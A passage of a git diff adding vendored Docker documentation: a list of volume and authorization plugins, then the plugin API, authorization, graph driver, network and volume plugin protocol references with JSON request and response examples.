+[Weave Network Plugin](https://www.weave.works/docs/net/latest/introducing-weave/) | A network plugin that creates a virtual network that connects your Docker containers - across multiple hosts or clouds and enables automatic discovery of applications. Weave networks are resilient, partition tolerant, secure and work in partially connected networks, and other adverse environments - all configured with delightful simplicity. + +### Volume plugins + +Plugin | Description +----------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +[Azure File Storage plugin](https://github.com/Azure/azurefile-dockervolumedriver) | Lets you mount Microsoft [Azure File Storage](https://azure.microsoft.com/blog/azure-file-storage-now-generally-available/) shares to Docker containers as volumes using the SMB 3.0 protocol. [Learn more](https://azure.microsoft.com/blog/persistent-docker-volumes-with-azure-file-storage/). +[Blockbridge plugin](https://github.com/blockbridge/blockbridge-docker-volume) | A volume plugin that provides access to an extensible set of container-based persistent storage options. It supports single and multi-host Docker environments with features that include tenant isolation, automated provisioning, encryption, secure deletion, snapshots and QoS. +[Contiv Volume Plugin](https://github.com/contiv/volplugin) | An open source volume plugin that provides multi-tenant, persistent, distributed storage with intent based consumption. It has support for Ceph and NFS. +[Convoy plugin](https://github.com/rancher/convoy) | A volume plugin for a variety of storage back-ends including device mapper and NFS. 
It's a simple standalone executable written in Go and provides the framework to support vendor-specific extensions such as snapshots, backups and restore. +[DRBD plugin](https://www.drbd.org/en/supported-projects/docker) | A volume plugin that provides highly available storage replicated by [DRBD](https://www.drbd.org). Data written to the docker volume is replicated in a cluster of DRBD nodes. +[Flocker plugin](https://clusterhq.com/docker-plugin/) | A volume plugin that provides multi-host portable volumes for Docker, enabling you to run databases and other stateful containers and move them around across a cluster of machines. +[gce-docker plugin](https://github.com/mcuadros/gce-docker) | A volume plugin able to attach, format and mount Google Compute [persistent-disks](https://cloud.google.com/compute/docs/disks/persistent-disks). +[GlusterFS plugin](https://github.com/calavera/docker-volume-glusterfs) | A volume plugin that provides multi-host volumes management for Docker using GlusterFS. +[Horcrux Volume Plugin](https://github.com/muthu-r/horcrux) | A volume plugin that allows on-demand, version controlled access to your data. Horcrux is an open-source plugin, written in Go, and supports SCP, [Minio](https://www.minio.io) and Amazon S3. +[HPE 3Par Volume Plugin](https://github.com/hpe-storage/python-hpedockerplugin/) | A volume plugin that supports HPE 3Par and StoreVirtual iSCSI storage arrays. +[IPFS Volume Plugin](http://github.com/vdemeester/docker-volume-ipfs) | An open source volume plugin that allows using an [ipfs](https://ipfs.io/) filesystem as a volume. +[Keywhiz plugin](https://github.com/calavera/docker-volume-keywhiz) | A plugin that provides credentials and secret management using Keywhiz as a central repository. 
+[Local Persist Plugin](https://github.com/CWSpear/local-persist) | A volume plugin that extends the default `local` driver's functionality by allowing you specify a mountpoint anywhere on the host, which enables the files to *always persist*, even if the volume is removed via `docker volume rm`. +[NetApp Plugin](https://github.com/NetApp/netappdvp) (nDVP) | A volume plugin that provides direct integration with the Docker ecosystem for the NetApp storage portfolio. The nDVP package supports the provisioning and management of storage resources from the storage platform to Docker hosts, with a robust framework for adding additional platforms in the future. +[Netshare plugin](https://github.com/ContainX/docker-volume-netshare) | A volume plugin that provides volume management for NFS 3/4, AWS EFS and CIFS file systems. +[OpenStorage Plugin](https://github.com/libopenstorage/openstorage) | A cluster-aware volume plugin that provides volume management for file and block storage solutions. It implements a vendor neutral specification for implementing extensions such as CoS, encryption, and snapshots. It has example drivers based on FUSE, NFS, NBD and EBS to name a few. +[Portworx Volume Plugin](https://github.com/portworx/px-dev) | A volume plugin that turns any server into a scale-out converged compute/storage node, providing container granular storage and highly available volumes across any node, using a shared-nothing storage backend that works with any docker scheduler. +[Quobyte Volume Plugin](https://github.com/quobyte/docker-volume) | A volume plugin that connects Docker to [Quobyte](http://www.quobyte.com/containers)'s data center file system, a general-purpose scalable and fault-tolerant storage platform. +[REX-Ray plugin](https://github.com/emccode/rexray) | A volume plugin which is written in Go and provides advanced storage functionality for many platforms including VirtualBox, EC2, Google Compute Engine, OpenStack, and EMC. 
+[Virtuozzo Storage and Ploop plugin](https://github.com/virtuozzo/docker-volume-ploop) | A volume plugin with support for Virtuozzo Storage distributed cloud file system as well as ploop devices. +[VMware vSphere Storage Plugin](https://github.com/vmware/docker-volume-vsphere) | Docker Volume Driver for vSphere enables customers to address persistent storage requirements for Docker containers in vSphere environments. + +### Authorization plugins + + Plugin | Description +------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ + [Twistlock AuthZ Broker](https://github.com/twistlock/authz) | A basic extendable authorization plugin that runs directly on the host or inside a container. This plugin allows you to define user policies that it evaluates during authorization. Basic authorization is provided if Docker daemon is started with the --tlsverify flag (username is extracted from the certificate common name). + +## Troubleshooting a plugin + +If you are having problems with Docker after loading a plugin, ask the authors +of the plugin for help. The Docker team may not be able to assist you. + +## Writing a plugin + +If you are interested in writing a plugin for Docker, or seeing how they work +under the hood, see the [docker plugins reference](plugin_api.md). 
diff --git a/vendor/github.com/docker/docker/docs/extend/plugin_api.md b/vendor/github.com/docker/docker/docs/extend/plugin_api.md new file mode 100644 index 0000000000..693b77a2f3 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/plugin_api.md @@ -0,0 +1,196 @@ +--- +title: "Plugins API" +description: "How to write Docker plugins extensions " +keywords: "API, Usage, plugins, documentation, developer" +--- + + + +# Docker Plugin API + +Docker plugins are out-of-process extensions which add capabilities to the +Docker Engine. + +This document describes the Docker Engine plugin API. To view information on +plugins managed by Docker Engine, refer to [Docker Engine plugin system](index.md). + +This page is intended for people who want to develop their own Docker plugin. +If you just want to learn about or use Docker plugins, look +[here](legacy_plugins.md). + +## What plugins are + +A plugin is a process running on the same or a different host as the docker daemon, +which registers itself by placing a file on the same docker host in one of the plugin +directories described in [Plugin discovery](#plugin-discovery). + +Plugins have human-readable names, which are short, lowercase strings. For +example, `flocker` or `weave`. + +Plugins can run inside or outside containers. Currently running them outside +containers is recommended. + +## Plugin discovery + +Docker discovers plugins by looking for them in the plugin directory whenever a +user or container tries to use one by name. + +There are three types of files which can be put in the plugin directory. + +* `.sock` files are UNIX domain sockets. +* `.spec` files are text files containing a URL, such as `unix:///other.sock` or `tcp://localhost:8080`. +* `.json` files are text files containing a full json specification for the plugin. + +Plugins with UNIX domain socket files must run on the same docker host, whereas +plugins with spec or json files can run on a different host if a remote URL is specified. 
+ +UNIX domain socket files must be located under `/run/docker/plugins`, whereas +spec files can be located either under `/etc/docker/plugins` or `/usr/lib/docker/plugins`. + +The name of the file (excluding the extension) determines the plugin name. + +For example, the `flocker` plugin might create a UNIX socket at +`/run/docker/plugins/flocker.sock`. + +You can define each plugin into a separated subdirectory if you want to isolate definitions from each other. +For example, you can create the `flocker` socket under `/run/docker/plugins/flocker/flocker.sock` and only +mount `/run/docker/plugins/flocker` inside the `flocker` container. + +Docker always searches for unix sockets in `/run/docker/plugins` first. It checks for spec or json files under +`/etc/docker/plugins` and `/usr/lib/docker/plugins` if the socket doesn't exist. The directory scan stops as +soon as it finds the first plugin definition with the given name. + +### JSON specification + +This is the JSON format for a plugin: + +```json +{ + "Name": "plugin-example", + "Addr": "https://example.com/docker/plugin", + "TLSConfig": { + "InsecureSkipVerify": false, + "CAFile": "/usr/shared/docker/certs/example-ca.pem", + "CertFile": "/usr/shared/docker/certs/example-cert.pem", + "KeyFile": "/usr/shared/docker/certs/example-key.pem" + } +} +``` + +The `TLSConfig` field is optional and TLS will only be verified if this configuration is present. + +## Plugin lifecycle + +Plugins should be started before Docker, and stopped after Docker. For +example, when packaging a plugin for a platform which supports `systemd`, you +might use [`systemd` dependencies]( +http://www.freedesktop.org/software/systemd/man/systemd.unit.html#Before=) to +manage startup and shutdown order. + +When upgrading a plugin, you should first stop the Docker daemon, upgrade the +plugin, then start Docker again. + +## Plugin activation + +When a plugin is first referred to -- either by a user referring to it by name +(e.g. 
`docker run --volume-driver=foo`) or a container already configured to +use a plugin being started -- Docker looks for the named plugin in the plugin +directory and activates it with a handshake. See Handshake API below. + +Plugins are *not* activated automatically at Docker daemon startup. Rather, +they are activated only lazily, or on-demand, when they are needed. + +## Systemd socket activation + +Plugins may also be socket activated by `systemd`. The official [Plugins helpers](https://github.com/docker/go-plugins-helpers) +natively supports socket activation. In order for a plugin to be socket activated it needs +a `service` file and a `socket` file. + +The `service` file (for example `/lib/systemd/system/your-plugin.service`): + +``` +[Unit] +Description=Your plugin +Before=docker.service +After=network.target your-plugin.socket +Requires=your-plugin.socket docker.service + +[Service] +ExecStart=/usr/lib/docker/your-plugin + +[Install] +WantedBy=multi-user.target +``` +The `socket` file (for example `/lib/systemd/system/your-plugin.socket`): + +``` +[Unit] +Description=Your plugin + +[Socket] +ListenStream=/run/docker/plugins/your-plugin.sock + +[Install] +WantedBy=sockets.target +``` + +This will allow plugins to be actually started when the Docker daemon connects to +the sockets they're listening on (for instance the first time the daemon uses them +or if one of the plugin goes down accidentally). + +## API design + +The Plugin API is RPC-style JSON over HTTP, much like webhooks. + +Requests flow *from* the Docker daemon *to* the plugin. So the plugin needs to +implement an HTTP server and bind this to the UNIX socket mentioned in the +"plugin discovery" section. + +All requests are HTTP `POST` requests. + +The API is versioned via an Accept header, which currently is always set to +`application/vnd.docker.plugins.v1+json`. + +## Handshake API + +Plugins are activated via the following "handshake" API call. 
+ +### /Plugin.Activate + +**Request:** empty body + +**Response:** +``` +{ + "Implements": ["VolumeDriver"] +} +``` + +Responds with a list of Docker subsystems which this plugin implements. +After activation, the plugin will then be sent events from this subsystem. + +Possible values are: + +* [`authz`](plugins_authorization.md) +* [`NetworkDriver`](plugins_network.md) +* [`VolumeDriver`](plugins_volume.md) + + +## Plugin retries + +Attempts to call a method on a plugin are retried with an exponential backoff +for up to 30 seconds. This may help when packaging plugins as containers, since +it gives plugin containers a chance to start up before failing any user +containers which depend on them. + +## Plugins helpers + +To ease plugins development, we're providing an `sdk` for each kind of plugins +currently supported by Docker at [docker/go-plugins-helpers](https://github.com/docker/go-plugins-helpers). diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md b/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md new file mode 100644 index 0000000000..ac1837f754 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md @@ -0,0 +1,260 @@ +--- +title: "Access authorization plugin" +description: "How to create authorization plugins to manage access control to your Docker daemon." +keywords: "security, authorization, authentication, docker, documentation, plugin, extend" +redirect_from: +- "/engine/extend/authorization/" +--- + + + +# Create an authorization plugin + +This document describes the Docker Engine plugins generally available in Docker +Engine. To view information on plugins managed by Docker Engine, +refer to [Docker Engine plugin system](index.md). + +Docker's out-of-the-box authorization model is all or nothing. Any user with +permission to access the Docker daemon can run any Docker client command. The +same is true for callers using Docker's Engine API to contact the daemon. 
If you +require greater access control, you can create authorization plugins and add +them to your Docker daemon configuration. Using an authorization plugin, a +Docker administrator can configure granular access policies for managing access +to Docker daemon. + +Anyone with the appropriate skills can develop an authorization plugin. These +skills, at their most basic, are knowledge of Docker, understanding of REST, and +sound programming knowledge. This document describes the architecture, state, +and methods information available to an authorization plugin developer. + +## Basic principles + +Docker's [plugin infrastructure](plugin_api.md) enables +extending Docker by loading, removing and communicating with +third-party components using a generic API. The access authorization subsystem +was built using this mechanism. + +Using this subsystem, you don't need to rebuild the Docker daemon to add an +authorization plugin. You can add a plugin to an installed Docker daemon. You do +need to restart the Docker daemon to add a new plugin. + +An authorization plugin approves or denies requests to the Docker daemon based +on both the current authentication context and the command context. The +authentication context contains all user details and the authentication method. +The command context contains all the relevant request data. + +Authorization plugins must follow the rules described in [Docker Plugin API](plugin_api.md). +Each plugin must reside within directories described under the +[Plugin discovery](plugin_api.md#plugin-discovery) section. + +**Note**: the abbreviations `AuthZ` and `AuthN` mean authorization and authentication +respectively. + +## Default user authorization mechanism + +If TLS is enabled in the [Docker daemon](https://docs.docker.com/engine/security/https/), the default user authorization flow extracts the user details from the certificate subject name. 
+That is, the `User` field is set to the client certificate subject common name, and the `AuthenticationMethod` field is set to `TLS`. + +## Basic architecture + +You are responsible for registering your plugin as part of the Docker daemon +startup. You can install multiple plugins and chain them together. This chain +can be ordered. Each request to the daemon passes in order through the chain. +Only when all the plugins grant access to the resource, is the access granted. + +When an HTTP request is made to the Docker daemon through the CLI or via the +Engine API, the authentication subsystem passes the request to the installed +authentication plugin(s). The request contains the user (caller) and command +context. The plugin is responsible for deciding whether to allow or deny the +request. + +The sequence diagrams below depict an allow and deny authorization flow: + +![Authorization Allow flow](images/authz_allow.png) + +![Authorization Deny flow](images/authz_deny.png) + +Each request sent to the plugin includes the authenticated user, the HTTP +headers, and the request/response body. Only the user name and the +authentication method used are passed to the plugin. Most importantly, no user +credentials or tokens are passed. Finally, not all request/response bodies +are sent to the authorization plugin. Only those request/response bodies where +the `Content-Type` is either `text/*` or `application/json` are sent. + +For commands that can potentially hijack the HTTP connection (`HTTP +Upgrade`), such as `exec`, the authorization plugin is only called for the +initial HTTP requests. Once the plugin approves the command, authorization is +not applied to the rest of the flow. Specifically, the streaming data is not +passed to the authorization plugins. For commands that return chunked HTTP +response, such as `logs` and `events`, only the HTTP request is sent to the +authorization plugins. 
+ +During request/response processing, some authorization flows might +need to do additional queries to the Docker daemon. To complete such flows, +plugins can call the daemon API similar to a regular user. To enable these +additional queries, the plugin must provide the means for an administrator to +configure proper authentication and security policies. + +## Docker client flows + +To enable and configure the authorization plugin, the plugin developer must +support the Docker client interactions detailed in this section. + +### Setting up Docker daemon + +Enable the authorization plugin with a dedicated command line flag in the +`--authorization-plugin=PLUGIN_ID` format. The flag supplies a `PLUGIN_ID` +value. This value can be the plugin’s socket or a path to a specification file. +Authorization plugins can be loaded without restarting the daemon. Refer +to the [`dockerd` documentation](../reference/commandline/dockerd.md#configuration-reloading) for more information. + +```bash +$ dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... +``` + +Docker's authorization subsystem supports multiple `--authorization-plugin` parameters. + +### Calling authorized command (allow) + +```bash +$ docker pull centos +... +f1b10cd84249: Pull complete +... +``` + +### Calling unauthorized command (deny) + +```bash +$ docker pull centos +... +docker: Error response from daemon: authorization denied by plugin PLUGIN_NAME: volumes are not allowed. +``` + +### Error from plugins + +```bash +$ docker pull centos +... +docker: Error response from daemon: plugin PLUGIN_NAME failed with error: AuthZPlugin.AuthZReq: Cannot connect to the Docker daemon. Is the docker daemon running on this host?. 
+``` + +## API schema and implementation + +In addition to Docker's standard plugin registration method, each plugin +should implement the following two methods: + +* `/AuthZPlugin.AuthZReq` This authorize request method is called before the Docker daemon processes the client request. + +* `/AuthZPlugin.AuthZRes` This authorize response method is called before the response is returned from Docker daemon to the client. + +#### /AuthZPlugin.AuthZReq + +**Request**: + +```json +{ + "User": "The user identification", + "UserAuthNMethod": "The authentication method used", + "RequestMethod": "The HTTP method", + "RequestURI": "The HTTP request URI", + "RequestBody": "Byte array containing the raw HTTP request body", + "RequestHeader": "Byte array containing the raw HTTP request header as a map[string][]string " +} +``` + +**Response**: + +```json +{ + "Allow": "Determined whether the user is allowed or not", + "Msg": "The authorization message", + "Err": "The error message if things go wrong" +} +``` +#### /AuthZPlugin.AuthZRes + +**Request**: + +```json +{ + "User": "The user identification", + "UserAuthNMethod": "The authentication method used", + "RequestMethod": "The HTTP method", + "RequestURI": "The HTTP request URI", + "RequestBody": "Byte array containing the raw HTTP request body", + "RequestHeader": "Byte array containing the raw HTTP request header as a map[string][]string", + "ResponseBody": "Byte array containing the raw HTTP response body", + "ResponseHeader": "Byte array containing the raw HTTP response header as a map[string][]string", + "ResponseStatusCode":"Response status code" +} +``` + +**Response**: + +```json +{ + "Allow": "Determined whether the user is allowed or not", + "Msg": "The authorization message", + "Err": "The error message if things go wrong" +} +``` + +### Request authorization + +Each plugin must support two request authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. 
The tables below detail the content expected in each message. + +#### Daemon -> Plugin + +Name | Type | Description +-----------------------|-------------------|------------------------------------------------------- +User | string | The user identification +Authentication method | string | The authentication method used +Request method | enum | The HTTP method (GET/DELETE/POST) +Request URI | string | The HTTP request URI including API version (e.g., v.1.17/containers/json) +Request headers | map[string]string | Request headers as key value pairs (without the authorization header) +Request body | []byte | Raw request body + + +#### Plugin -> Daemon + +Name | Type | Description +--------|--------|---------------------------------------------------------------------------------- +Allow | bool | Boolean value indicating whether the request is allowed or denied +Msg | string | Authorization message (will be returned to the client in case the access is denied) +Err | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information) + +### Response authorization + +The plugin must support two authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message. 
+ +#### Daemon -> Plugin + + +Name | Type | Description +----------------------- |------------------ |---------------------------------------------------- +User | string | The user identification +Authentication method | string | The authentication method used +Request method | string | The HTTP method (GET/DELETE/POST) +Request URI | string | The HTTP request URI including API version (e.g., v.1.17/containers/json) +Request headers | map[string]string | Request headers as key value pairs (without the authorization header) +Request body | []byte | Raw request body +Response status code | int | Status code from the docker daemon +Response headers | map[string]string | Response headers as key value pairs +Response body | []byte | Raw docker daemon response body + + +#### Plugin -> Daemon + +Name | Type | Description +--------|--------|---------------------------------------------------------------------------------- +Allow | bool | Boolean value indicating whether the response is allowed or denied +Msg | string | Authorization message (will be returned to the client in case the access is denied) +Err | string | Error message (will be returned to the client in case the plugin encounter an error. 
The string value supplied may appear in logs, so should not include confidential information) diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md b/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md new file mode 100644 index 0000000000..d91c383b5f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md @@ -0,0 +1,376 @@ +--- +title: "Graphdriver plugins" +description: "How to manage image and container filesystems with external plugins" +keywords: "Examples, Usage, storage, image, docker, data, graph, plugin, api" +advisory: experimental +--- + + + + +## Changelog + +### 1.13.0 + +- Support v2 plugins + +# Docker graph driver plugins + +Docker graph driver plugins enable admins to use an external/out-of-process +graph driver for use with Docker engine. This is an alternative to using the +built-in storage drivers, such as aufs/overlay/devicemapper/btrfs. + +You need to install and enable the plugin and then restart the Docker daemon +before using the plugin. See the following example for the correct ordering +of steps. + +``` +$ docker plugin install cpuguy83/docker-overlay2-graphdriver-plugin # this command also enables the driver + +$ pkill dockerd +$ dockerd --experimental -s cpuguy83/docker-overlay2-graphdriver-plugin +``` + +# Write a graph driver plugin + +See the [plugin documentation](/docs/extend/index.md) for detailed information +on the underlying plugin protocol. + + +## Graph Driver plugin protocol + +If a plugin registers itself as a `GraphDriver` when activated, then it is +expected to provide the rootfs for containers as well as image layer storage. + +### /GraphDriver.Init + +**Request**: +```json +{ + "Home": "/graph/home/path", + "Opts": [], + "UIDMaps": [], + "GIDMaps": [] +} +``` + +Initialize the graph driver plugin with a home directory and array of options. +These are passed through from the user, but the plugin is not required to parse +or honor them. 
+
+The request also includes a list of UID and GID mappings, structured as follows:
+```json
+{
+  "ContainerID": 0,
+  "HostID": 0,
+  "Size": 0
+}
+```
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+
+
+### /GraphDriver.Create
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142",
+  "MountLabel": "",
+  "StorageOpt": {}
+}
+```
+
+Create a new, empty, read-only filesystem layer with the specified
+`ID`, `Parent` and `MountLabel`. If `Parent` is an empty string, there is no
+parent layer. `StorageOpt` is a map of strings which indicate storage options.
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.CreateReadWrite
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142",
+  "MountLabel": "",
+  "StorageOpt": {}
+}
+```
+
+Similar to `/GraphDriver.Create` but creates a read-write filesystem layer.
+
+### /GraphDriver.Remove
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
+}
+```
+
+Remove the filesystem layer with this given `ID`.
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.Get
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "MountLabel": ""
+}
+```
+
+Get the mountpoint for the layered filesystem referred to by the given `ID`.
+
+**Response**:
+```json
+{
+  "Dir": "/var/mygraph/46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Err": ""
+}
+```
+
+Respond with the absolute path to the mounted layered filesystem.
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.Put
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
+}
+```
+
+Release the system resources for the specified `ID`, such as unmounting the
+filesystem layer.
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.Exists
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
+}
+```
+
+Determine if a filesystem layer with the specified `ID` exists.
+
+**Response**:
+```json
+{
+  "Exists": true
+}
+```
+
+Respond with a boolean for whether or not the filesystem layer with the specified
+`ID` exists.
+
+### /GraphDriver.Status
+
+**Request**:
+```json
+{}
+```
+
+Get low-level diagnostic information about the graph driver.
+
+**Response**:
+```json
+{
+  "Status": [[]]
+}
+```
+
+Respond with a 2-D array with key/value pairs for the underlying status
+information.
+
+
+### /GraphDriver.GetMetadata
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
+}
+```
+
+Get low-level diagnostic information about the layered filesystem with the
+specified `ID`
+
+**Response**:
+```json
+{
+  "Metadata": {},
+  "Err": ""
+}
+```
+
+Respond with a set of key/value pairs containing the low-level diagnostic
+information about the layered filesystem.
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.Cleanup
+
+**Request**:
+```json
+{}
+```
+
+Perform necessary tasks to release resources held by the plugin, such as
+unmounting all the layered file systems.
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+ + +### /GraphDriver.Diff + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", + "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" +} +``` + +Get an archive of the changes between the filesystem layers specified by the `ID` +and `Parent`. `Parent` may be an empty string, in which case there is no parent. + +**Response**: +``` +{{ TAR STREAM }} +``` + +### /GraphDriver.Changes + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", + "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" +} +``` + +Get a list of changes between the filesystem layers specified by the `ID` and +`Parent`. If `Parent` is an empty string, there is no parent. + +**Response**: +```json +{ + "Changes": [{}], + "Err": "" +} +``` + +Respond with a list of changes. The structure of a change is: +```json + "Path": "/some/path", + "Kind": 0, +``` + +Where the `Path` is the filesystem path within the layered filesystem that is +changed and `Kind` is an integer specifying the type of change that occurred: + +- 0 - Modified +- 1 - Added +- 2 - Deleted + +Respond with a non-empty string error if an error occurred. + +### /GraphDriver.ApplyDiff + +**Request**: +``` +{{ TAR STREAM }} +``` + +Extract the changeset from the given diff into the layer with the specified `ID` +and `Parent` + +**Query Parameters**: + +- id (required)- the `ID` of the new filesystem layer to extract the diff to +- parent (required)- the `Parent` of the given `ID` + +**Response**: +```json +{ + "Size": 512366, + "Err": "" +} +``` + +Respond with the size of the new layer in bytes. +Respond with a non-empty string error if an error occurred. 
+
+### /GraphDriver.DiffSize
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142"
+}
+```
+
+Calculate the changes between the specified `ID` and `Parent`.
+
+**Response**:
+```json
+{
+  "Size": 512366,
+  "Err": ""
+}
+```
+
+Respond with the size changes between the specified `ID` and `Parent`.
+Respond with a non-empty string error if an error occurred.
diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_network.md b/vendor/github.com/docker/docker/docs/extend/plugins_network.md
new file mode 100644
index 0000000000..a974862fa6
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/plugins_network.md
@@ -0,0 +1,77 @@
+---
+title: "Docker network driver plugins"
+description: "Network driver plugins."
+keywords: "Examples, Usage, plugins, docker, documentation, user guide"
+---
+
+
+# Engine network driver plugins
+
+This document describes Docker Engine network driver plugins generally
+available in Docker Engine. To view information on plugins
+managed by Docker Engine, refer to [Docker Engine plugin system](index.md).
+
+Docker Engine network plugins enable Engine deployments to be extended to
+support a wide range of networking technologies, such as VXLAN, IPVLAN, MACVLAN
+or something completely different. Network driver plugins are supported via the
+LibNetwork project. Each plugin is implemented as a "remote driver" for
+LibNetwork, which shares plugin infrastructure with Engine. Effectively, network
+driver plugins are activated in the same way as other plugins, and use the same
+kind of protocol.
+
+## Network driver plugins and swarm mode
+
+Docker 1.12 adds support for cluster management and orchestration called
+[swarm mode](https://docs.docker.com/engine/swarm/). Docker Engine running in swarm mode currently
+only supports the built-in overlay driver for networking.
Therefore existing +networking plugins will not work in swarm mode. + +When you run Docker Engine outside of swarm mode, all networking plugins that +worked in Docker 1.11 will continue to function normally. They do not require +any modification. + +## Using network driver plugins + +The means of installing and running a network driver plugin depend on the +particular plugin. So, be sure to install your plugin according to the +instructions obtained from the plugin developer. + +Once running however, network driver plugins are used just like the built-in +network drivers: by being mentioned as a driver in network-oriented Docker +commands. For example, + + $ docker network create --driver weave mynet + +Some network driver plugins are listed in [plugins](legacy_plugins.md) + +The `mynet` network is now owned by `weave`, so subsequent commands +referring to that network will be sent to the plugin, + + $ docker run --network=mynet busybox top + + +## Write a network plugin + +Network plugins implement the [Docker plugin +API](plugin_api.md) and the network plugin protocol + +## Network plugin protocol + +The network driver protocol, in addition to the plugin activation call, is +documented as part of libnetwork: +[https://github.com/docker/libnetwork/blob/master/docs/remote.md](https://github.com/docker/libnetwork/blob/master/docs/remote.md). + +# Related Information + +To interact with the Docker maintainers and other interested users, see the IRC channel `#docker-network`. 
+ +- [Docker networks feature overview](https://docs.docker.com/engine/userguide/networking/) +- The [LibNetwork](https://github.com/docker/libnetwork) project diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_volume.md b/vendor/github.com/docker/docker/docs/extend/plugins_volume.md new file mode 100644 index 0000000000..c060bf39b1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/plugins_volume.md @@ -0,0 +1,276 @@ +--- +title: "Volume plugins" +description: "How to manage data with external volume plugins" +keywords: "Examples, Usage, volume, docker, data, volumes, plugin, api" +--- + + + +# Write a volume plugin + +Docker Engine volume plugins enable Engine deployments to be integrated with +external storage systems, such as Amazon EBS, and enable data volumes to persist +beyond the lifetime of a single Engine host. See the +[plugin documentation](legacy_plugins.md) for more information. + +## Changelog + +### 1.13.0 + +- If used as part of the v2 plugin architecture, mountpoints that are part of paths returned by plugin have to be mounted under the directory specified by PropagatedMount in the plugin configuration [#26398](https://github.com/docker/docker/pull/26398) + +### 1.12.0 + +- Add `Status` field to `VolumeDriver.Get` response ([#21006](https://github.com/docker/docker/pull/21006#)) +- Add `VolumeDriver.Capabilities` to get capabilities of the volume driver([#22077](https://github.com/docker/docker/pull/22077)) + +### 1.10.0 + +- Add `VolumeDriver.Get` which gets the details about the volume ([#16534](https://github.com/docker/docker/pull/16534)) +- Add `VolumeDriver.List` which lists all volumes owned by the driver ([#16534](https://github.com/docker/docker/pull/16534)) + +### 1.8.0 + +- Initial support for volume driver plugins ([#14659](https://github.com/docker/docker/pull/14659)) + +## Command-line changes + +A volume plugin makes use of the `-v`and `--volume-driver` flag on the `docker run` command. 
The `-v` flag accepts a volume name and the `--volume-driver` flag a driver type, for example:

    $ docker run -ti -v volumename:/data --volume-driver=flocker busybox sh

+This command passes the `volumename` through to the volume plugin as a
+user-given name for the volume. The `volumename` must not begin with a `/`.
+
+By having the user specify a `volumename`, a plugin can associate the volume
+with an external volume beyond the lifetime of a single container or container
+host. This can be used, for example, to move a stateful container from one
+server to another.
+
+By specifying a `volumedriver` in conjunction with a `volumename`, users can use plugins such as [Flocker](https://clusterhq.com/docker-plugin/) to manage volumes external to a single host, such as those on EBS.
+
+
+## Create a VolumeDriver
+
+The container creation endpoint (`/containers/create`) accepts a `VolumeDriver`
+field of type `string` allowing you to specify the name of the driver. Its
+default value is `"local"` (the default driver for local volumes).
+
+## Volume plugin protocol
+
+If a plugin registers itself as a `VolumeDriver` when activated, then it is
+expected to provide writeable paths on the host filesystem for the Docker
+daemon to provide to containers to consume.
+
+The Docker daemon handles bind-mounting the provided paths into user
+containers.
+
+> **Note**: Volume plugins should *not* write data to the `/var/lib/docker/`
+> directory, including `/var/lib/docker/volumes`. The `/var/lib/docker/`
+> directory is reserved for Docker.
+
+### /VolumeDriver.Create
+
+**Request**:
+```json
